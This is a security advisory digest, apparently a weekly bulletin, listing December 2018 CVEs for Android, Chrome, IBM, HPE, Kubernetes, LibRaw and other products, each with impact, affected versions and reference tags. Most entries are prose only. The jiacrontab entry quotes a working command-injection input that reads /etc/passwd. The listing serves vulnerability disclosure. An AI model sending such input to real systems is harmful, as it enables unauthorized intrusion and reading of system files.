google — android In V4L2SliceVideoDecodeAccelerator::Dequeue of v4l2_slice_video_decode_accelerator.cc, there is a possible out of bounds read of a function pointer due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-112181526. 2018-12-06 not yet calculated CVE-2018-9538
BID
CONFIRM
google — android In CAacDecoder_Init of aacdecoder.cpp, there is a possible out-of-bound write due to a missing bounds check. This could lead to remote code execution in the media server with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-112891548. 2018-12-06 not yet calculated CVE-2018-9551
BID
CONFIRM
google — android In ihevcd_sao_shift_ctb of ihevcd_sao.c there is a possible out of bounds write due to missing bounds check. This could lead to information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-113260892. 2018-12-06 not yet calculated CVE-2018-9552
BID
CONFIRM
google — android In ParsePayloadHeader of payload_metadata.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113118184. 2018-12-06 not yet calculated CVE-2018-9556
CONFIRM
google — android In impd_parse_loud_eq_instructions of impd_drc_dynamic_payload.c there is a possible out-of-bound write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116020594. 2018-12-07 not yet calculated CVE-2018-9571
CONFIRM
google — android In nfc_llcp_build_sdreq_tlv of llcp_commands.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-73083945. 2018-12-07 not yet calculated CVE-2018-9518
CONFIRM
UBUNTU
UBUNTU
google — android In dumpExtractors of IMediaExtractor.cp, there is a possible disclosure of recently accessed media files due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1. Android ID: A-114770654. 2018-12-06 not yet calculated CVE-2018-9554
BID
CONFIRM
google — android In l2c_lcc_proc_pdu of l2c_fcr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112321180. 2018-12-06 not yet calculated CVE-2018-9555
CONFIRM
google — android In impd_parse_parametric_drc_instructions of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116715245. 2018-12-07 not yet calculated CVE-2018-9576
CONFIRM
google — android In easelcomm_hw_build_scatterlist, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with System privileges required. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-69808833. 2018-12-07 not yet calculated CVE-2018-9519
CONFIRM
google — android In pppol2tp_connect, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-38159931. 2018-12-07 not yet calculated CVE-2018-9517
CONFIRM
google — android In impd_parametric_drc_parse_gain_set_params of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116715937. 2018-12-07 not yet calculated CVE-2018-9577
CONFIRM
google — android In multiple functions of ContentProvider.java, there is a possible permission bypass due to a missing URI validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112555574. 2018-12-06 not yet calculated CVE-2018-9548
BID
CONFIRM
google — android In impd_parse_dwnmix_instructions of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116619387. 2018-12-07 not yet calculated CVE-2018-9575
CONFIRM
google — android In unflatten of GraphicBuffer.cpp, there is a possible bad fd close due to improper input validation. This could lead to local escalation of privilege in the system server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-114223584. 2018-12-06 not yet calculated CVE-2018-9547
BID
CONFIRM
google — android In MasteringMetadata::Parse of mkvparser.cc there is a possible double free due to an insecure default value. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-116615297. 2018-12-06 not yet calculated CVE-2018-9553
BID
CONFIRM
google — android In ixheaacd_adts_crc_start_reg of ixheaacd_adts_crc_check.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113261928. 2018-12-07 not yet calculated CVE-2018-9578
CONFIRM
google — android In rw_t2t_handle_tlv_detect of rw_t2t_ndef.cc, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege in the NFC kernel with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112161557. 2018-12-06 not yet calculated CVE-2018-9558
CONFIRM
google — android In readBytes of xltdecwbxml.c, there is a possible out of bounds read due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-16680558. 2018-12-06 not yet calculated CVE-2018-9565
BID
CONFIRM
google — android In process_service_search_rsp of sdp_discovery.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure when connecting to a malicious Bluetooth device with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-74249842. 2018-12-06 not yet calculated CVE-2018-9566
CONFIRM
google — android On Pixel devices there is a bug causing verified boot to show the same certificate fingerprint despite using different signing keys. This may lead to local escalation of privilege if people are relying on those fingerprints to determine what version of the OS the device is running, with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-65543936. 2018-12-06 not yet calculated CVE-2018-9567
BID
CONFIRM
google — android In impd_parse_split_drc_characteristic of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116619337. 2018-12-07 not yet calculated CVE-2018-9574
CONFIRM
google — android In sk_clone_lock of sock.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-113509306. References: Upstream kernel. 2018-12-06 not yet calculated CVE-2018-9568
CONFIRM
google — android In impd_init_drc_decode_post_config of impd_drc_gain_decoder.c there is a possible out-of-bound write due to incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113885537. 2018-12-07 not yet calculated CVE-2018-9569
CONFIRM
google — android In CAacDecoder_Init of aacdecoder.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-112660981. 2018-12-06 not yet calculated CVE-2018-9550
BID
CONFIRM
google — android In impd_parse_drc_ext_v1 of impd_drc_dynamic_payload.c there is a possible out-of-bound write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-115375616. 2018-12-07 not yet calculated CVE-2018-9570
CONFIRM
google — android In bta_ag_do_disc of bta_ag_sdp.cc, there is a possible out-of-bound read due to an incorrect parameter size. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113164621. 2018-12-06 not yet calculated CVE-2018-9562
CONFIRM
google — android In really_install_package of install.cpp, there is a possible free of arbitrary memory due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2. Android ID: A-35385357. 2018-12-06 not yet calculated CVE-2018-9557
CONFIRM
google — android In impd_parse_filt_block of impd_drc_dynamic_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116467350. 2018-12-07 not yet calculated CVE-2018-9573
CONFIRM
google — android In HID_DevAddRecord of hidd_api.cc, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege in the Bluetooth service with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-79946737. 2018-12-06 not yet calculated CVE-2018-9560
CONFIRM
google — android In impd_drc_parse_coeff of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116224432. 2018-12-07 not yet calculated CVE-2018-9572
CONFIRM
google — android In persist_set_key and other functions of cryptfs.cpp, there is a possible out-of-bounds write due to an uncaught error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112731440. 2018-12-06 not yet calculated CVE-2018-9559
CONFIRM
google — chrome A lack of host validation in DevTools in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code via a crafted HTML page, if the user is running a remote DevTools debugging server. 2018-12-04 not yet calculated CVE-2018-6101
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome An integer overflow on 32-bit systems in WebAssembly in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6092
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
EXPLOIT-DB
google — chrome An integer overflow that lead to a heap buffer-overflow in Skia in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6090
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome An iterator-invalidation bug in PDFium in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. 2018-12-04 not yet calculated CVE-2018-6088
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A use-after-free in WebAssembly in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6087
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Re-entry of a destructor in Networking Disk Cache in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6085
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6108
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Inappropriate setting of the SEE_MASK_FLAG_NO_UI flag in file downloads in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to potentially bypass OS malware checks via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6115
BID
CONFIRM
MISC
GENTOO
google — chrome Inappropriate dismissal of file picker on keyboard events in Blink in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to read local files via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6095
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A double-eviction in the Incognito mode cache that lead to a user-after-free in Networking Disk Cache in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6086
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Inline metadata in GarbageCollection in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6094
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome The implementation of the Page.downloadBehavior backend unconditionally marked downloaded files as safe, regardless of file type in Google Chrome prior to 66.0.3359.106 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted HTML page and user interaction. 2018-12-04 not yet calculated CVE-2018-6152
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6104
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A stagnant permission prompt in Prompts in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to bypass permission policy via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6103
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6098
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Missing confusable characters in Internationalization in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6102
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in Omnibox in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6105
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6107
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A lack of CORS checks in Blink in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to leak limited cross-origin data via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6099
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A nullptr dereference in WebAssembly in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6116
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome
 
A lack of CORS checks, after a Service Worker redirected to a cross-origin PDF, in Service Worker in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to leak limited cross-origin data via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6089
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
hashicorp — vault HashiCorp Vault before 1.0.0 writes the master key to the server log in certain unusual or misconfigured scenarios in which incorrect data comes from the autoseal mechanism without an error being reported. 2018-12-05 not yet calculated CVE-2018-19786
CONFIRM
hitshop — hitshop An issue was discovered in hitshop through 2014-07-15. There is an elevation-of-privilege vulnerability (that allows control over the whole web site) via the admin.php/user/add URI because a storekeeper account (which is supposed to have only privileges for commodity management) can add an administrator account. 2018-12-04 not yet calculated CVE-2018-19853
MISC
hpe — integrated_lights-out_5 A security vulnerability in HPE Integrated Lights-Out 5 (iLO 5) prior to v1.37 could be locally exploited to bypass the security restrictions for firmware updates. 2018-12-03 not yet calculated CVE-2018-7113
SECTRACK
CONFIRM
hpe — intelligent_management_center HPE Intelligent Management Center (IMC) prior to IMC PLAT 7.3 (E0605P06) is vulnerable to remote buffer overflow in dbman leading to code execution. This problem is resolved in IMC PLAT 7.3 (E0605P06) or subsequent versions. 2018-12-03 not yet calculated CVE-2018-7114
SECTRACK
MISC
CONFIRM
hpe — intelligent_management_center HPE Intelligent Management Center (IMC) prior to IMC PLAT 7.3 (E0605P06) is vulnerable to a remote denial of service via dbman Opcode 10003 ‘Filename’. This problem is resolved in IMC PLAT 7.3 (E0605P06) or subsequent versions. 2018-12-03 not yet calculated CVE-2018-7116
SECTRACK
MISC
CONFIRM
hpe — intelligent_management_center HPE Intelligent Management Center (IMC) prior to IMC PLAT 7.3 (E0605P06) is vulnerable to a remote buffer overflow in dbman.exe opcode 10001 on Windows. This problem is resolved in IMC PLAT 7.3 (E0605P06) or subsequent versions. 2018-12-03 not yet calculated CVE-2018-7115
SECTRACK
MISC
CONFIRM
hpe — multiple_servers The HPE-provided Windows firmware installer for certain Gen9, Gen8, G7,and G6 HPE servers allows local disclosure of privileged information. This issue was resolved in previously provided firmware updates as follows. The HPE Windows firmware installer was updated in the system ROM updates which also addressed the original Spectre/Meltdown set of vulnerabilities. At that time, the Windows firmware installer was also updated in the versions of HPE Integrated Lights-Out 2, 3, and 4 (iLO 2, 3, and 4) listed in the security bulletin. The updated HPE Windows firmware installer was released in the system ROM and HPE Integrated Lights-Out (iLO) releases documented in earlier HPE Security Bulletins: HPESBHF03805, HPESBHF03835, HPESBHF03831. Windows-based systems that have already been updated to the system ROM or iLO versions described in these security bulletins require no further action. 2018-12-03 not yet calculated CVE-2018-7112
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
huawei — p20_smartphones There is an out-of-bounds write vulnerability on Huawei P20 smartphones with versions before 8.1.0.171(C00). The software does not handle the response message properly when the user doing certain inquiry operation, an attacker could send crafted message to the device, successful exploit could cause a denial of service condition. 2018-12-04 not yet calculated CVE-2018-7987
CONFIRM
huawei — vip_app Huawei VIP App is a mobile app for Malaysia customers that purchased P20 Series, Nova 3/3i and Mate 20. There is a vulnerability in versions before 4.0.5 that attackers can conduct bruteforce to the VIP App Web Services to get user information. 2018-12-04 not yet calculated CVE-2018-7956
CONFIRM
hunan_jinyun_network_technology — pbootcms SearchController.php in PbootCMS 1.2.1 has SQL injection via the index.php/Search/index.html query string. 2018-12-05 not yet calculated CVE-2018-19893
MISC
ibm — campaign IBM Campaign 9.1.0 and 9.1.2 could allow a local user to obtain admini privileges due to the application not validating access permissions. IBM X-Force ID: 153382. 2018-12-05 not yet calculated CVE-2018-1941
XF
CONFIRM
ibm — connections IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315. 2018-12-06 not yet calculated CVE-2018-1935
BID
XF
CONFIRM
ibm — connections IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker’s domain. IBM X-Force ID: 152456. 2018-12-07 not yet calculated CVE-2018-1896
XF
CONFIRM
ibm — datapower_gateways IBM DataPower Gateways 7.5, 7.5.1, 7.5.2, 7.6, and 2018.4 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 144889. 2018-12-07 not yet calculated CVE-2018-1663
XF
CONFIRM
ibm — db2_for_linux_unix_and_windows IBM DB2 for Linux, UNIX and Windows 9.7, 10.1, 10.5., and 11.1 db2pdcfg is vulnerable to a stack based buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code. IBM X-Force ID: 152462. 2018-11-30 not yet calculated CVE-2018-1897
CONFIRM
BID
SECTRACK
XF
ibm — financial_transaction_manager_for_digital_payments_for_multi-platform IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.0, 3.0.2, and 3.0.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 151329. 2018-12-06 not yet calculated CVE-2018-1871
CONFIRM
XF
ibm — i2_enterprise_insight_analysis IBM i2 Enterprise Insight Analysis 2.1.7 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim’s click actions and possibly launch further attacks against the victim. IBM X-Force ID: 141340. 2018-12-06 not yet calculated CVE-2018-1504
XF
CONFIRM
ibm — i2_enterprise_insight_analysis IBM i2 Enterprise Insight Analysis 2.1.7 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 142117. 2018-12-06 not yet calculated CVE-2018-1525
XF
CONFIRM
ibm — i2_enterprise_insight_analysis IBM i2 Enterprise Insight Analysis 2.1.7 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 141413. 2018-12-06 not yet calculated CVE-2018-1505
XF
CONFIRM
ibm — marketing_platform IBM Marketing Platform 9.1.0, 9.1.2 and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 152855. 2018-12-07 not yet calculated CVE-2018-1920
CONFIRM
XF
ibm — marketing_platform IBM Marketing Platform 9.1.0, 9.1.2, and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 139029. 2018-12-07 not yet calculated CVE-2018-1424
CONFIRM
XF
ibm — maximo_asset_mangement IBM Maximo Asset Management 7.6 could allow an authenticated user to enumerate usernames using a specially crafted HTTP request. IBM X-Force ID: 145966. 2018-12-05 not yet calculated CVE-2018-1697
XF
CONFIRM
ibm — mq_and_console_rest_api A problem within the IBM MQ 9.0.2, 9.0.3, 9.0.4, 9.0.5, and 9.1.0.0 Console REST API Could allow attackers to execute a denial of service attack preventing users from logging into the MQ Console REST API. IBM X-Force ID: 151969. 2018-12-07 not yet calculated CVE-2018-1883
XF
CONFIRM
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 uses hard-coded credentials which could allow an attacker to bypass the authentication configured by the administrator. IBM X-Force ID: 144656. 2018-12-05 not yet calculated CVE-2018-1650
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 143118. 2018-12-05 not yet calculated CVE-2018-1568
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 147707. 2018-12-05 not yet calculated CVE-2018-1728
XF
CONFIRM
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 147709. 2018-12-05 not yet calculated CVE-2018-1730
XF
CONFIRM
ibm — qradar_siem IBM QRadar SIEM 1.14.0 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 147810. 2018-12-05 not yet calculated CVE-2018-1732
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 144653. 2018-12-05 not yet calculated CVE-2018-1648
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2.8 and 7.3 does not validate, or incorrectly validates, a certificate. This weakness might allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack. IBM X-force ID: 133120. 2018-12-05 not yet calculated CVE-2017-1622
XF
CONFIRM
ibm — websphere_application_server IBM WebSphere Application Server 8.5 and 9.0 could allow a remote attacker to gain elevated privileges on the system, caused when a security domain is configured to use a federated repository other than global federated repository and then migrated to a newer release of WebSphere Application Server. IBM X-Force ID: 150813. 2018-12-03 not yet calculated CVE-2018-1840
XF
CONFIRM
intelliants — subrion_cms Subrion CMS v4.2.1 allows XSS via the panel/configuration/general/ SITE TITLE parameter. 2018-12-04 not yet calculated CVE-2018-16631
MISC
intelliants — subrion_cms panel/uploads/#elf_l1_XA in Subrion CMS v4.2.1 allows XSS via an SVG file with JavaScript in a SCRIPT element. 2018-12-04 not yet calculated CVE-2018-16629
MISC
intel — integrated performance primitives Data leakage in cryptographic libraries for Intel IPP before 2019 update1 release may allow an authenticated user to potentially enable information disclosure via local access. 2018-12-05 not yet calculated CVE-2018-12155
CONFIRM
internet2 — grouper Cross-site scripting (XSS) vulnerability in UiV2Public.index in Internet2 Grouper 2.2 and 2.3 allows remote attackers to inject arbitrary web script or HTML via the code parameter. 2018-12-03 not yet calculated CVE-2018-19794
MISC
MISC
MISC
jiacrontab — jiacrontab jiacrontab 1.4.5 allows remote attackers to execute arbitrary commands via the crontab/task/edit?addr=localhost%3a20001 command and args parameters, as demonstrated by command=cat&args=/etc/passwd in the POST data. 2018-12-03 not yet calculated CVE-2018-19793
MISC
kubernetes — kubernetes In Kubernetes versions 1.9.0-1.9.9, 1.10.0-1.10.5, and 1.11.0-1.11.1, user input was handled insecurely while setting up volume mounts on Windows nodes, which could lead to command line argument injection. 2018-12-05 not yet calculated CVE-2018-1002101
CONFIRM
kubernetes — kubernetes In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server’s TLS credentials used to establish the backend connection. 2018-12-05 not yet calculated CVE-2018-1002105
BID
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
MISC
CONFIRM
CONFIRM
kubernetes — kubernetes In Minikube versions 0.3.0-0.29.0, minikube exposes the Kubernetes Dashboard listening on the VM IP at port 30000. In VM environments where the IP is easy to predict, the attacker can use DNS rebinding to indirectly make requests to the Kubernetes Dashboard, create a new Kubernetes Deployment running arbitrary code. If minikube mount is in use, the attacker could also directly access the host filesystem. 2018-12-05 not yet calculated CVE-2018-1002103
CONFIRM
libraw — libraw An error within the “LibRaw::xtrans_interpolate()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.6 can be exploited to cause an invalid read memory access and subsequently a Denial of Service condition. 2018-12-07 not yet calculated CVE-2017-16910
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw A boundary error within the “quicktake_100_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.8 can be exploited to cause a stack-based buffer overflow and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5805
REDHAT
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “leaf_hdr_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.8 can be exploited to trigger a NULL pointer dereference. 2018-12-07 not yet calculated CVE-2018-5806
REDHAT
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “LibRaw::unpack()” function (src/libraw_cxx.cpp) in LibRaw versions prior to 0.18.7 can be exploited to trigger a NULL pointer dereference. 2018-12-07 not yet calculated CVE-2018-5801
REDHAT
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “kodak_radc_load_raw()” function (internal/dcraw_common.cpp) related to the “buf” variable in LibRaw versions prior to 0.18.7 can be exploited to cause an out-of-bounds read memory access and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5802
REDHAT
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An integer overflow error within the “parse_qt()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.12 can be exploited to trigger an infinite loop via a specially crafted Apple QuickTime file. 2018-12-07 not yet calculated CVE-2018-5815
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An integer overflow error within the “identify()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.12 can be exploited to trigger a division by zero via specially crafted NOKIARAW file (Note: This vulnerability is caused due to an incomplete fix of CVE-2018-5804). 2018-12-07 not yet calculated CVE-2018-5816
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “samsung_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause an out-of-bounds read memory access and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5807
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “LibRaw::parse_exif()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause a stack-based buffer overflow and subsequently execute arbitrary code. 2018-12-07 not yet calculated CVE-2018-5809
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “find_green()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause a stack-based buffer overflow and subsequently execute arbitrary code. 2018-12-07 not yet calculated CVE-2018-5808
MISC
MISC
SECUNIA
MISC
